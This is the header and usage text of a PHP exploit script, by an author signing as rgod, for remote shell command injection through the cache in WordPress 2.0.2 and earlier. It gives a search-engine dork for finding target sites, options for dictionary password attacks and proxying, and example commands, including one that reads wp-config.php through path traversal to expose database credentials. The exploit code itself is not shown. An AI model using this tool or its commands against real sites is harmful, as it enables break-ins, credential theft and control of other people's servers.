#!/usr/bin/php -q -d short_open_tag=on
--------------------------------------------------------------------
| WordPress <= 2.0.2 'cache' shell injection exploit               |
| by rgod rgod@autistici.org                                       |
| site: http://retrogod.altervista.org                             |
| dork: inurl:wp-login.php Register Username Password -echo        |
--------------------------------------------------------------------
Usage: php  host path user pass cmd OPTIONS             
host:      target server (ip/hostname)                              
path:      path to WordPress                                        
cmd:       a shell command                                          
user/pass: you need a valid user account                            
Options:                                                            
   -D[dicrionary] specify a textfile and try dictionary attack      
   -p[port]:        "  a port other than 80                        
   -P[ip:port]:     "  a proxy                                     
Examples:                                                           
php  localhost /wordpress/ your_username password ls -la -Ddic.txt
php  localhost /wordpress/ your_username password cat ./../../../wp-config.php -p81
php  localhost / your_username password ls -la -P1.1.1.1:80